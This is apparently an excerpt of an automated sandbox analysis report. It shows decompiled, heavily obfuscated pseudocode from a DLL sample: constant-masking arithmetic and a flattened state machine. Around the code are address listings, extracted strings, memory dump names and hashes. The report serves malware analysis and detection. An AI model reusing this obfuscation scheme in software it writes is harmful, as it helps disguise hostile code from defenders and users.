				_v292 = 0x216e58;
				_v292 = _v292 / _t862;
				_v292 = _v292 + 0xffff8880;
				_v292 = _v292 ^ 0xfff3b1bc;
				_v176 = 0xac4eb4;
				_v176 = _v176 | 0xd866b52c;
				_v176 = _v176 ^ 0xd8e8b8b7;
				_v236 = 0x7a6201;
				_v236 = _v236 ^ 0x2461ec4e;
				_t863 = 0xa;
				_v236 = _v236 * 0x35;
				_v236 = _v236 ^ 0x79bb4b53;
				_v220 = 0xf5a9fb;
				_v220 = _v220 << 1;
				_v220 = _v220 >> 5;
				_v220 = _v220 ^ 0x000a39a7;
				_v380 = 0x7beff6;
				_v380 = _v380 / _t863;
				_v380 = _v380 | 0x5a206f9b;
				_v380 = _v380 * 0x3d;
				_v380 = _v380 ^ 0x7c9823d9;
				_v284 = 0xdc7201;
				_v284 = _v284 ^ 0xec4f9d75;
				_v284 = _v284 << 8;
				_v284 = _v284 ^ 0x93e140b6;
				_v396 = 0x36b797;
				_v396 = _v396 + 0x83f2;
				_v396 = _v396 | 0xb5da4ffa;
				_v396 = _v396 ^ 0x8c9f27f1;
				_v396 = _v396 ^ 0x3962cb66;
				_v364 = 0x608af6;
				_v364 = _v364 >> 0xe;
				_v364 = _v364 ^ 0xb06c2668;
				_v364 = _v364 >> 0xa;
				_v364 = _v364 ^ 0x0022b374;
				_v404 = 0xe18b1f;
				_v404 = _v404 + 0xffff49de;
				_v404 = _v404 + 0xffffa950;
				_v404 = _v404 >> 5;
				_v404 = _v404 ^ 0x000802e7;
				_v168 = 0x720eed;
				_v168 = _v168 | 0xf4577aa8;
				_v168 = _v168 ^ 0xf4704e8f;
				_v328 = 0x5e39f;
				_v328 = _v328 * 0x2a;
				_v328 = _v328 ^ 0x47860790;
				_v328 = _v328 ^ 0x47706e69;
				_v336 = 0xdd3db6;
				_v336 = _v336 ^ 0x0be1064e;
				_v336 = _v336 ^ 0xe0fa941c;
				_v336 = _v336 ^ 0xebc1ff07;
				_v340 = 0x8bacdf;
				_t864 = 0x49;
				_v340 = _v340 / _t864;
				_t865 = 0x77;
				_v340 = _v340 * 0x4d;
				_v340 = _v340 ^ 0x0099a7e7;
				_v440 = 0x29fcf0;
				_v440 = _v440 >> 4;
				_v440 = _v440 ^ 0x37539152;
				_v440 = _v440 / _t865;
				_v440 = _v440 ^ 0x007580f6;
				_v400 = 0x753dd5;
				_v400 = _v400 ^ 0x142a6b84;
				_v400 = _v400 ^ 0x6d30c2ad;
				_v400 = _v400 ^ 0xe014bebf;
				_v400 = _v400 ^ 0x997c2220;
				_v128 = 0x8b3cd;
				_v128 = _v128 << 2;
				_v128 = _v128 ^ 0x002b9a55;
				_v408 = 0x5fd2f;
				_v408 = _v408 >> 9;
				_t866 = 0x69;
				_v408 = _v408 * 0x53;
				_v408 = _v408 * 0x58;
				_v408 = _v408 ^ 0x00501640;
				_v416 = 0x7e5e32;
				_v416 = _v416 | 0x37c3b1cb;
				_v416 = _v416 + 0x4e4b;
				_v416 = _v416 | 0xc7e68b70;
				_v416 = _v416 ^ 0xffec3e94;
				_v304 = 0xac72e0;
				_v304 = _v304 + 0xffff9516;
				_v304 = _v304 | 0x0ab72207;
				_v304 = _v304 ^ 0x0aba1474;
				_v424 = 0x91a63a;
				_v424 = _v424 | 0xeda6ffa9;
				_v424 = _v424 ^ 0xa7761782;
				_v424 = _v424 << 0xe;
				_v424 = _v424 ^ 0x7a08e30a;
				_v436 = 0x9e7f8b;
				_v436 = _v436 | 0x84ca61f6;
				_v436 = _v436 << 2;
				_v436 = _v436 * 0x3e;
				_v436 = _v436 ^ 0xb78cfbfa;
				_v216 = 0x303808;
				_v216 = _v216 + 0xef78;
				_v216 = _v216 / _t980;
				_v216 = _v216 ^ 0x000455e2;
				_v312 = 0x19b522;
				_v312 = _v312 << 7;
				_v312 = _v312 ^ 0x11162953;
				_v312 = _v312 ^ 0x1dcfd305;
				_v212 = 0x8a6fc0;
				_v212 = _v212 << 9;
				_v212 = _v212 ^ 0x14d4ca12;
				_v276 = 0xdb7845;
				_v276 = _v276 / _t866;
				_v276 = _v276 * 0x1c;
				_v276 = _v276 ^ 0x003237f1;
				_v124 = 0x91e545;
				_t867 = 0x7b;
				_v124 = _v124 / _t867;
				_v124 = _v124 ^ 0x0004745c;
				_v192 = 0x2154b3;
				_v192 = _v192 ^ 0x5324a52c;
				_v192 = _v192 ^ 0x530d1a47;
				_v140 = 0x7913eb;
				_v140 = _v140 | 0xe487e648;
				_v140 = _v140 ^ 0xe4fd51cb;
				_v428 = 0x8a554f;
				_v428 = _v428 << 1;
				_v428 = _v428 + 0xffff493d;
				_v428 = _v428 | 0x8f4663f4;
				_v428 = _v428 ^ 0x8f592165;
				_v200 = 0x5c4830;
				_v200 = _v200 + 0xffffe35d;
				_v200 = _v200 ^ 0x00549f8c;
				_v132 = 0x6e2e79;
				_t377 =  &_v132; // 0x6e2e79
				_t981 = 0x62;
				_v132 =  *_t377 / _t981;
				_v132 = _v132 ^ 0x000a369f;
				_v244 = 0x1d0d9a;
				_t868 = 0x6e;
				_v244 = _v244 / _t868;
				_v244 = _v244 ^ 0xec9a9004;
				_v244 = _v244 ^ 0xec94e609;
				_v148 = 0xd4a92;
				_v148 = _v148 + 0xffffbc3f;
				_v148 = _v148 ^ 0x00088ca7;
				_v184 = 0x3666a0;
				_v184 = _v184 >> 0xb;
				_v184 = _v184 ^ 0x00096f18;
				_v228 = 0x713966;
				_v228 = _v228 << 3;
				_v228 = _v228 << 0xb;
				_v228 = _v228 ^ 0x4e5b426e;
				_v316 = 0xec09e9;
				_v316 = _v316 << 7;
				_t869 = 0x78;
				_v316 = _v316 / _t869;
				_v316 = _v316 ^ 0x00fe5880;
				_v268 = 0x8ffe81;
				_v268 = _v268 + 0xffff4311;
				_v268 = _v268 ^ 0x56e15418;
				_v268 = _v268 ^ 0x566a144b;
				_v324 = 0x9f4c2e;
				_v324 = _v324 >> 4;
				_v324 = _v324 | 0x903f3b4d;
				_v324 = _v324 ^ 0x9031b6d7;
				_v196 = 0x6080cf;
				_v196 = _v196 << 0xe;
				_v196 = _v196 ^ 0x203ba000;
				_v256 = 0x4bba45;
				_v256 = _v256 + 0xc17c;
				_v256 = _v256 | 0x95e268b8;
				_v256 = _v256 ^ 0x95e68234;
				_v264 = 0x7821fc;
				_v264 = _v264 << 3;
				_t870 = 0x34;
				_v264 = _v264 / _t870;
				_v264 = _v264 ^ 0x001694e5;
				_v204 = 0x96f3a5;
				_v204 = _v204 * 0x24;
				_v204 = _v204 ^ 0x153e3a4b;
				_v368 = 0xbef911;
				_t871 = 0xe;
				_v368 = _v368 / _t871;
				_v368 = _v368 >> 0xb;
				_v368 = _v368 + 0x5de4;
				_v368 = _v368 ^ 0x00021c01;
				_v376 = 0x377d04;
				_v376 = _v376 + 0xcef;
				_v376 = _v376 ^ 0x9e466b70;
				_t872 = 0x59;
				_v376 = _v376 * 0x6b;
				_v376 = _v376 ^ 0x399834bf;
				_v180 = 0x6632ea;
				_v180 = _v180 | 0x3a3e38fd;
				_v180 = _v180 ^ 0x3a73a81b;
				_v248 = 0x142cd9;
				_v248 = _v248 / _t872;
				_v248 = _v248 / _t981;
				_v248 = _v248 ^ 0x0001d965;
				_v188 = 0x88b8e9;
				_v188 = _v188 + 0xffff5f5f;
				_v188 = _v188 ^ 0x0087927e;
				_v164 = 0x9c013d;
				_t873 = 0xa;
				_v164 = _v164 / _t873;
				_v164 = _v164 ^ 0x0004ead6;
				_v172 = 0x53b5f1;
				_v172 = _v172 + 0xd9f2;
				_v172 = _v172 ^ 0x005588af;
				_v360 = 0xd6ac8a;
				_v360 = _v360 | 0xfdf9fa5f;
				_v360 = _v360 ^ 0xfdfecc4d;
				_v224 = 0xfb951e;
				_v224 = _v224 + 0xffff2e4c;
				_v224 = _v224 + 0x8dcd;
				_v224 = _v224 ^ 0x00f1d24a;
				_v272 = 0x6e5d6f;
				_v272 = _v272 << 2;
				_t874 = 0x6f;
				_v272 = _v272 / _t874;
				_v272 = _v272 ^ 0x000d7a86;
				_v384 = 0x15dc31;
				_v384 = _v384 + 0xfffffc55;
				_v384 = _v384 << 0x10;
				_v384 = _v384 >> 0xa;
				_v384 = _v384 ^ 0x003c4753;
				_v392 = 0x7bc513;
				_v392 = _v392 * 0x54;
				_v392 = _v392 | 0xe01c3b63;
				_v392 = _v392 + 0xe1b2;
				_v392 = _v392 ^ 0xe89c6b16;
				_v420 = 0x6862b7;
				_v420 = _v420 ^ 0x841c6550;
				_v420 = _v420 + 0xd52;
				_v420 = _v420 >> 0x10;
				_v420 = _v420 ^ 0x000e8d54;
				_v388 = 0x19484a;
				_t982 = 0x6f661e6;
				_t875 = 0x68;
				_v388 = _v388 / _t875;
				_t876 = 0xd;
				_v92 = 0x100;
				_v388 = _v388 * 0x61;
				_v388 = _v388 << 6;
				_v388 = _v388 ^ 0x05e5c873;
				_v432 = 0xb160;
				_v432 = _v432 * 0x78;
				_v432 = _v432 >> 8;
				_v432 = _v432 ^ 0xee0de4a9;
				_v432 = _v432 ^ 0xee0e3c37;
				_v320 = 0x436488;
				_v320 = _v320 * 0x7d;
				_v320 = _v320 * 0x24;
				_v320 = _v320 ^ 0xa0a81f1c;
				_v136 = 0x73af31;
				_v136 = _v136 >> 0xf;
				_v136 = _v136 ^ 0x0004ab53;
				_v120 = 0xd23217;
				_v120 = _v120 | 0x86b48086;
				_v120 = _v120 ^ 0x86fe303d;
				_v280 = 0x567562;
				_v280 = _v280 / _t876;
				_v280 = _v280 + 0xffff7ef5;
				_v280 = _v280 ^ 0x00098751;
				_v152 = 0x24c9f6;
				_v152 = _v152 + 0x7f22;
				_v152 = _v152 ^ 0x002f2944;
				_v156 = 0xe548b;
				_v156 = _v156 + 0xe219;
				_v156 = _v156 ^ 0x000a95de;
				_v352 = 0xccf4e9;
				_v352 = _v352 | 0x0ed71748;
				_v352 = _v352 + 0xefd9;
				_v352 = _v352 << 3;
				_v352 = _v352 ^ 0x770f1835;
				while(1) {
					L1:
					while(1) {
						L2:
						while(1) {
							L3:
							_t957 = 0xaefec99;
							do {
								while(1) {
									L4:
									_t996 = _t853 - 0x89f995e;
									if(_t996 > 0) {
										break;
									}
									if(_t996 == 0) {
										E00D4C237(_v108, _v432, _v320, _v136);
										_t853 = 0xc502d5f;
										while(1) {
											L1:
											goto L2;
										}
									} else {
										if(_t853 == 0x49f634) {
											_push(_v308);
											_push(_v356);
											_push(_v260);
											_t832 = E00D4E1F8(0xd313d8, _v300, __eflags);
											_push(_v236);
											_push(_v176);
											_push(_v292);
											__eflags = E00D3738A(_v220, _t832, _v380, _v412,  &_v112, E00D4E1F8(0xd31318, _v252, __eflags), _v284) - _v144;
											_t853 =  ==  ? 0xc917448 : 0x468e224;
											E00D4FECB(_t832, _v396, _v364, _v404, _v168);
											E00D4FECB(_t833, _v328, _v336, _v340, _v440);
											_t978 = _v96;
											_t987 = _t987 + 0x44;
											goto L31;
										} else {
											if(_t853 == 0x1281fcd) {
												E00D32EBF(_v420, _v104, _v388);
												_t853 = 0x89f995e;
												while(1) {
													L1:
													goto L2;
												}
											} else {
												if(_t853 == _t824) {
													_push(_v212);
													_push(_v312);
													_push(_v216);
													_t985 = E00D4E1F8(0xd31368, _v436, __eflags);
													_t901 = 0x48;
													_v100 = 0xd31368;
													_t844 = E00D516C0(_v276, 0xd31368, _v116,  &_v100, _v124, _v192, _t841, _v140, _v428, _t901, _v372, _v200, _v132,  &_v76);
													_t994 = _t987 + 0x3c;
													__eflags = _t844 - _v332;
													if(_t844 != _v332) {
														_t853 = 0xc502d5f;
													} else {
														_t975 =  *0xd56224; // 0x0
														E00D4C9B0(_v244, _t975 + 8, _v148, 0x40,  &_v68, _v184);
														_t994 = _t994 + 0x10;
														_t853 = 0x9badbc8;
													}
													E00D4FECB(_t985, _v228, _v316, _v268, _v324);
													_t987 = _t994 + 0xc;
													L31:
													_t982 = 0x6f661e6;
													_t824 = 0x38eaa65;
													_t882 = 0xe81b6a7;
													_t957 = 0xaefec99;
													goto L32;
												} else {
													if(_t853 == 0x5c5114f) {
														E00D3F7FE(_v156, _v112, _v352, _v344);
													} else {
														if(_t853 == _t982) {
															_t850 = E00D33431(_v104);
															_t853 = 0x1281fcd;
															__eflags = _t850;
															_t986 =  !=  ? 1 : _t986;
															while(1) {
																L1:
																L2:
																L3:
																_t957 = 0xaefec99;
																goto L4;
															}
														} else {
															if(_t853 != 0x87433f6) {
																goto L32;
															} else {
																_t853 = 0x49f634;
																continue;
															}
														}
													}
												}
											}
										}
									}
									L35:
									return _t986;
								}
								__eflags = _t853 - 0x9badbc8;
								if(__eflags == 0) {
									_push(_v204);
									_push(_v264);
									_push(_v256);
									__eflags = E00D3BC32( *((intOrPtr*)(_t978 + 4)),  &_v108, _v240, _v368, _v376, E00D4E1F8(0xd31368, _v196, __eflags),  *_t978, _v180, _v248, _v112, 0xd31368, _v188) - _v232;
									_t853 =  ==  ? 0xaefec99 : 0xc502d5f;
									E00D4FECB(_t819, _v164, _v172, _v360, _v224);
									_t987 = _t987 + 0x40;
									goto L31;
								} else {
									__eflags = _t853 - _t957;
									if(_t853 == _t957) {
										_t825 = E00D351E7( &_v104, _v272, _v116, _v108, _v208, _v384, _v392);
										_t987 = _t987 + 0x14;
										__eflags = _t825;
										_t853 =  ==  ? _t982 : 0x89f995e;
										goto L1;
									} else {
										__eflags = _t853 - 0xc502d5f;
										if(_t853 == 0xc502d5f) {
											E00D4C237(_v116, _v120, _v280, _v152);
											_t853 = 0x5c5114f;
											while(1) {
												L1:
												goto L2;
											}
										} else {
											__eflags = _t853 - 0xc917448;
											if(_t853 == 0xc917448) {
												_v100 = _v92;
												_t829 = E00D543E6(_v400, _v128, _v408, _v112, _v416, _v160,  &_v116, _v92);
												_t987 = _t987 + 0x18;
												__eflags = _t829 - _v288;
												_t882 = 0xe81b6a7;
												_t824 = 0x38eaa65;
												_t853 =  ==  ? 0xe81b6a7 : 0x5c5114f;
												goto L3;
											} else {
												__eflags = _t853 - _t882;
												if(_t853 != _t882) {
													goto L32;
												} else {
													__eflags = E00D4C2CF(_v304, _v348, _v424, _v116) - _v296;
													_t824 = 0x38eaa65;
													_t853 =  ==  ? 0x38eaa65 : 0xc502d5f;
													goto L2;
												}
											}
										}
									}
								}
								goto L35;
								L32:
								__eflags = _t853 - 0x468e224;
							} while (__eflags != 0);
							goto L35;
						}
					}
				}
			}

0x00d40f90
0x00d40f92
0x00d40f99
0x00d40fa6
0x00d40fa8
0x00d40fad
0x00d40fb4
0x00d40fbb
0x00d40fc3
0x00d40fcb
0x00d40fd0
0x00d40fd8
0x00d40fe0
0x00d40feb
0x00d40ff3
0x00d40ffe
0x00d41013
0x00d4101a
0x00d41025
0x00d41030
0x00d4103b
0x00d41046
0x00d41051
0x00d41059
0x00d41061
0x00d41069
0x00d41074
0x00d4107f
0x00d4108a
0x00d41095
0x00d410a2
0x00d410a5
0x00d410a9
0x00d410b6
0x00d410ba
0x00d410bf
0x00d410ca
0x00d410d5
0x00d410e0
0x00d410eb
0x00d410f6
0x00d41101
0x00d4110c
0x00d41117
0x00d41122
0x00d41134
0x00d41139
0x00d41142
0x00d4114d
0x00d41160
0x00d41161
0x00d41168
0x00d41173
0x00d4117b
0x00d41186
0x00d4118a
0x00d4118f
0x00d4119a
0x00d411a5
0x00d411b0
0x00d411bb
0x00d411ce
0x00d411d7
0x00d411e2
0x00d411ea
0x00d411f2
0x00d41201
0x00d41204
0x00d41208
0x00d41210
0x00d4121b
0x00d4122b
0x00d41232
0x00d4123d
0x00d41248
0x00d41253
0x00d4125b
0x00d41266
0x00d4127c
0x00d41283
0x00d4128e
0x00d41299
0x00d412a4
0x00d412af
0x00d412ba
0x00d412c5
0x00d412d8
0x00d412d9
0x00d412e0
0x00d412eb
0x00d412f6
0x00d412fd
0x00d41305
0x00d41310
0x00d4131e
0x00d41322
0x00d4132f
0x00d41333
0x00d4133b
0x00d41346
0x00d41351
0x00d41359
0x00d41364
0x00d4136c
0x00d41374
0x00d4137c
0x00d41384
0x00d4138c
0x00d41394
0x00d41399
0x00d413a1
0x00d413a6
0x00d413ae
0x00d413b6
0x00d413be
0x00d413c6
0x00d413cb
0x00d413d3
0x00d413de
0x00d413e9
0x00d413f4
0x00d41407
0x00d4140e
0x00d41419
0x00d41424
0x00d4142c
0x00d41434
0x00d4143c
0x00d41444
0x00d41454
0x00d41459
0x00d41464
0x00d41467
0x00d4146b
0x00d41473
0x00d4147b
0x00d41480
0x00d41490
0x00d41494
0x00d4149c
0x00d414a4
0x00d414ac
0x00d414b4
0x00d414bc
0x00d414c4
0x00d414cf
0x00d414d7
0x00d414e2
0x00d414ea
0x00d414f4
0x00d414f5
0x00d414fe
0x00d41502
0x00d4150a
0x00d41512
0x00d4151a
0x00d41522
0x00d4152a
0x00d41532
0x00d4153d
0x00d41548
0x00d41553
0x00d4155e
0x00d41566
0x00d4156e
0x00d41576
0x00d4157b
0x00d41583
0x00d4158b
0x00d41593
0x00d4159d
0x00d415a1
0x00d415a9
0x00d415b4
0x00d415ca
0x00d415d1
0x00d415dc
0x00d415e7
0x00d415ef
0x00d415fa
0x00d41605
0x00d41610
0x00d41618
0x00d41623
0x00d41637
0x00d41646
0x00d4164d
0x00d4165a
0x00d4166e
0x00d41673
0x00d4167c
0x00d41687
0x00d41692
0x00d4169d
0x00d416a8
0x00d416b3
0x00d416be
0x00d416c9
0x00d416d1
0x00d416d5
0x00d416dd
0x00d416e5
0x00d416ed
0x00d416f8
0x00d41703
0x00d4170e
0x00d41719
0x00d41720
0x00d41725
0x00d4172e
0x00d41739
0x00d4174b
0x00d41750
0x00d41759
0x00d41764
0x00d4176f
0x00d4177a
0x00d41785
0x00d41790
0x00d4179b
0x00d417a3
0x00d417ae
0x00d417b9
0x00d417c1
0x00d417c9
0x00d417d4
0x00d417df
0x00d417ee
0x00d417f3
0x00d417fc
0x00d41807
0x00d41812
0x00d4181d
0x00d41828
0x00d41833
0x00d4183e
0x00d41846
0x00d41851
0x00d4185c
0x00d41867
0x00d4186f
0x00d4187a
0x00d41885
0x00d41890
0x00d4189b
0x00d418a6
0x00d418b1
0x00d418c0
0x00d418c3
0x00d418ca
0x00d418d5
0x00d418e8
0x00d418f1
0x00d418fc
0x00d4190a
0x00d4190f
0x00d41913
0x00d41918
0x00d41920
0x00d41928
0x00d41930
0x00d41938
0x00d41947
0x00d4194a
0x00d4194e
0x00d41956
0x00d41961
0x00d4196c
0x00d41977
0x00d4198d
0x00d4199f
0x00d419a6
0x00d419b1
0x00d419bc
0x00d419c7
0x00d419d2
0x00d419e4
0x00d419e9
0x00d419f2
0x00d419fd
0x00d41a08
0x00d41a13
0x00d41a1e
0x00d41a26
0x00d41a36
0x00d41a3e
0x00d41a49
0x00d41a54
0x00d41a5f
0x00d41a6a
0x00d41a75
0x00d41a84
0x00d41a87
0x00d41a8e
0x00d41a99
0x00d41aa1
0x00d41aa9
0x00d41aae
0x00d41ab3
0x00d41abb
0x00d41ac8
0x00d41acc
0x00d41ad4
0x00d41adc
0x00d41ae4
0x00d41aec
0x00d41af4
0x00d41afc
0x00d41b01
0x00d41b09
0x00d41b17
0x00d41b1e
0x00d41b23
0x00d41b2e
0x00d41b2f
0x00d41b3a
0x00d41b3e
0x00d41b43
0x00d41b4b
0x00d41b58
0x00d41b5c
0x00d41b61
0x00d41b69
0x00d41b71
0x00d41b84
0x00d41b93
0x00d41b9a
0x00d41ba5
0x00d41bb0
0x00d41bb8
0x00d41bc3
0x00d41bce
0x00d41bd9
0x00d41be4
0x00d41bf8
0x00d41bff
0x00d41c0a
0x00d41c15
0x00d41c20
0x00d41c2b
0x00d41c36
0x00d41c41
0x00d41c4c
0x00d41c57
0x00d41c5f
0x00d41c67
0x00d41c6f
0x00d41c74
0x00d41c7c
0x00d41c7c
0x00d41c81
0x00d41c81
0x00d41c86
0x00d41c86
0x00d41c86
0x00d41c8b
0x00d41c8b
0x00d41c8b
0x00d41c8b
0x00d41c91
0x00000000
0x00000000
0x00d41c97
0x00d41f03
0x00d41f0a
0x00d41c7c
0x00d41c7c
0x00000000
0x00d41c7c
0x00d41c9d
0x00d41ca3
0x00d41e0d
0x00d41e19
0x00d41e1d
0x00d41e2b
0x00d41e3a
0x00d41e41
0x00d41e48
0x00d41e97
0x00d41ea7
0x00d41eb6
0x00d41ed6
0x00d41edb
0x00d41ee2
0x00000000
0x00d41ca9
0x00d41caf
0x00d41dfd
0x00d41e03
0x00d41c7c
0x00d41c7c
0x00000000
0x00d41c7c
0x00d41cb5
0x00d41cb7
0x00d41cf7
0x00d41d03
0x00d41d0a
0x00d41d1d
0x00d41d28
0x00d41d38
0x00d41d76
0x00d41d7b
0x00d41d7e
0x00d41d85
0x00d41dbe
0x00d41d87
0x00d41d9f
0x00d41daf
0x00d41db4
0x00d41db7
0x00d41db7
0x00d41de1
0x00d41de6
0x00d420f6
0x00d420f6
0x00d420fb
0x00d42100
0x00d42105
0x00000000
0x00d41cb9
0x00d41cbf
0x00d4212e
0x00d41cc5
0x00d41cc7
0x00d41ce3
0x00d41cea
0x00d41cf0
0x00d41cf2
0x00d41c7c
0x00d41c7c
0x00d41c81
0x00d41c86
0x00d41c86
0x00000000
0x00d41c86
0x00d41cc9
0x00d41ccf
0x00000000
0x00d41cd5
0x00d41cd5
0x00000000
0x00d41cd5
0x00d41ccf
0x00d41cc7
0x00d41cbf
0x00d41cb7
0x00d41caf
0x00d41ca3
0x00d42137
0x00d42141
0x00d42141
0x00d41f14
0x00d41f1a
0x00d4204f
0x00d4205b
0x00d42062
0x00d420c6
0x00d420dd
0x00d420ee
0x00d420f3
0x00000000
0x00d41f20
0x00d41f20
0x00d41f22
0x00d42038
0x00d4203d
0x00d42045
0x00d42047
0x00000000
0x00d41f28
0x00d41f28
0x00d41f2e
0x00d41ffc
0x00d42003
0x00d41c7c
0x00d41c7c
0x00000000
0x00d41c7c
0x00d41f34
0x00d41f34
0x00d41f3a
0x00d41f86
0x00d41fb6
0x00d41fbd
0x00d41fcc
0x00d41fce
0x00d41fd3
0x00d41fd8
0x00000000
0x00d41f3c
0x00d41f3c
0x00d41f3e
0x00000000
0x00d41f44
0x00d41f6f
0x00d41f71
0x00d41f76
0x00000000
0x00d41f76
0x00d41f3e
0x00d41f3a
0x00d41f2e
0x00d41f22
0x00000000
0x00d4210a
0x00d4210a
0x00d4210a
0x00000000
0x00d42116
0x00d41c86
0x00d41c81

Strings

nB[N, xrefs: 00D417C9
y.n, xrefs: 00D41719
o]n, xrefs: 00D41A6A
buV, xrefs: 00D41BE4
2f, xrefs: 00D41956
inpG, xrefs: 00D41419
Na$, xrefs: 00D412C5
Xn!, xrefs: 00D41266
R, xrefs: 00D41AF4
inpG, xrefs: 00D413FF
jW, xrefs: 00D4107F
SG<, xrefs: 00D41AB3
0H\, xrefs: 00D416ED
], xrefs: 00D41918
KN, xrefs: 00D4151A
x, xrefs: 00D415B4
2^~, xrefs: 00D4150A
D)/, xrefs: 00D41C2B

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: 0H\$2^~$D)/$KN$Na$$R$SG<$Xn!$buV$inpG$inpG$jW$nB[N$o]n$x$y.n$2f$]
API String ID: 0-421492616
Opcode ID: a915ba2daf16c568811c91dde7698064839b3b0a982ab7f1e2ba3a36e8590447
Instruction ID: 732d0e5d796bba77e27f2f5623b560a5ea8f6d3db9ffade173588e028daec9b1
Opcode Fuzzy Hash: a915ba2daf16c568811c91dde7698064839b3b0a982ab7f1e2ba3a36e8590447
Instruction Fuzzy Hash: D892FE715093818FD379CF61C98AB9BBBE2FBC4304F10891DE69A86260D7B18949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 00D42E5D, Relevance: 21.9, Strings: 17, Instructions: 653
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E00D42E5D(int __ecx, signed int __edx) {
				char _v128;
				char _v256;
				char _v288;
				intOrPtr _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				unsigned int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				unsigned int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				unsigned int _v476;
				int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				unsigned int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				unsigned int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				unsigned int _v576;
				void* _t707;
				void* _t708;
				signed int _t718;
				signed int _t732;
				signed int _t737;
				int _t740;
				void* _t742;
				void* _t750;
				signed int _t752;
				signed int _t758;
				signed int _t768;
				signed int _t769;
				intOrPtr _t770;
				int _t774;
				signed int _t786;
				void* _t832;
				void* _t833;
				void* _t836;
				void* _t837;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				signed int _t854;
				signed int _t855;
				signed int _t856;
				signed int _t857;
				signed int _t858;
				signed int _t859;
				signed int _t860;
				void* _t861;
				void* _t864;
				void* _t867;
				signed int _t870;
				unsigned int* _t871;
				void* _t875;

				_t774 = __ecx;
				_t871 =  &_v576;
				_v296 = __edx;
				_v480 = __ecx;
				_v420 = 0x6e1d72;
				_v420 = _v420 << 5;
				_v420 = _v420 * 0x3c;
				_t864 = 0xffd9b77;
				_v420 = _v420 ^ 0x39dcd700;
				_v532 = 0x1f7a5f;
				_t845 = 0xe;
				_v532 = _v532 / _t845;
				_v532 = _v532 ^ 0x6f56ef0e;
				_v532 = _v532 >> 0xa;
				_v532 = _v532 ^ 0x001a3d41;
				_v508 = 0xe1e69b;
				_v508 = _v508 + 0x2215;
				_v508 = _v508 + 0xffff2958;
				_v508 = _v508 + 0xffffaa0c;
				_v508 = _v508 ^ 0x00efd475;
				_v540 = 0xcd1956;
				_v540 = _v540 | 0x45240a95;
				_t846 = 0x77;
				_v540 = _v540 * 0x18;
				_v540 = _v540 ^ 0x336e332d;
				_v540 = _v540 ^ 0xbd574949;
				_v484 = 0x334a44;
				_v484 = _v484 ^ 0x919eff65;
				_v484 = _v484 / _t846;
				_v484 = _v484 | 0x2d19544d;
				_v484 = _v484 ^ 0x2d3e50ce;
				_v436 = 0x66ccc0;
				_v436 = _v436 + 0xffffec65;
				_t847 = 0x52;
				_v436 = _v436 * 0x24;
				_v436 = _v436 ^ 0x0e7c9935;
				_v492 = 0x2c49e8;
				_v492 = _v492 << 6;
				_v492 = _v492 << 2;
				_v492 = _v492 + 0xffff7e7f;
				_v492 = _v492 ^ 0x2c4d1795;
				_v348 = 0xb21165;
				_v348 = _v348 >> 0xb;
				_v348 = _v348 ^ 0x000033e8;
				_v464 = 0x27371d;
				_v464 = _v464 / _t847;
				_v464 = _v464 + 0xc709;
				_v464 = _v464 ^ 0x00086d33;
				_v476 = 0xe8a891;
				_v476 = _v476 >> 0xf;
				_v476 = _v476 + 0xffff587a;
				_v476 = _v476 ^ 0xfffd6e16;
				_v568 = 0xc76fce;
				_v568 = _v568 + 0xbc5c;
				_v568 = _v568 * 3;
				_v568 = _v568 | 0x5aa2bc40;
				_v568 = _v568 ^ 0x5afa6d0d;
				_v456 = 0xcc33e1;
				_v456 = _v456 ^ 0x6317d795;
				_v456 = _v456 | 0x1eb23508;
				_v456 = _v456 ^ 0x7ff946e0;
				_v560 = 0xede4ef;
				_v560 = _v560 + 0xffffe679;
				_t848 = 0x70;
				_v560 = _v560 / _t848;
				_v560 = _v560 << 5;
				_v560 = _v560 ^ 0x0043644b;
				_v500 = 0x670a53;
				_v500 = _v500 | 0x71b65663;
				_t849 = 0x2b;
				_v500 = _v500 * 0x3d;
				_v500 = _v500 + 0xfb01;
				_v500 = _v500 ^ 0x27fbe352;
				_v460 = 0x5f6e6b;
				_v460 = _v460 << 0xe;
				_v460 = _v460 | 0xdb801e45;
				_v460 = _v460 ^ 0xdb911bcb;
				_v404 = 0x155fb3;
				_v404 = _v404 + 0x82cf;
				_v404 = _v404 | 0x7954f6f3;
				_v404 = _v404 ^ 0x79505431;
				_v364 = 0x6447e1;
				_v364 = _v364 << 4;
				_v364 = _v364 ^ 0x064cce00;
				_v452 = 0x93f6b7;
				_v452 = _v452 | 0x0efbc074;
				_v452 = _v452 * 0x74;
				_v452 = _v452 ^ 0xca274b72;
				_v516 = 0x2e9555;
				_v516 = _v516 * 0x4d;
				_v516 = _v516 ^ 0x52348c71;
				_v516 = _v516 + 0xffff65c2;
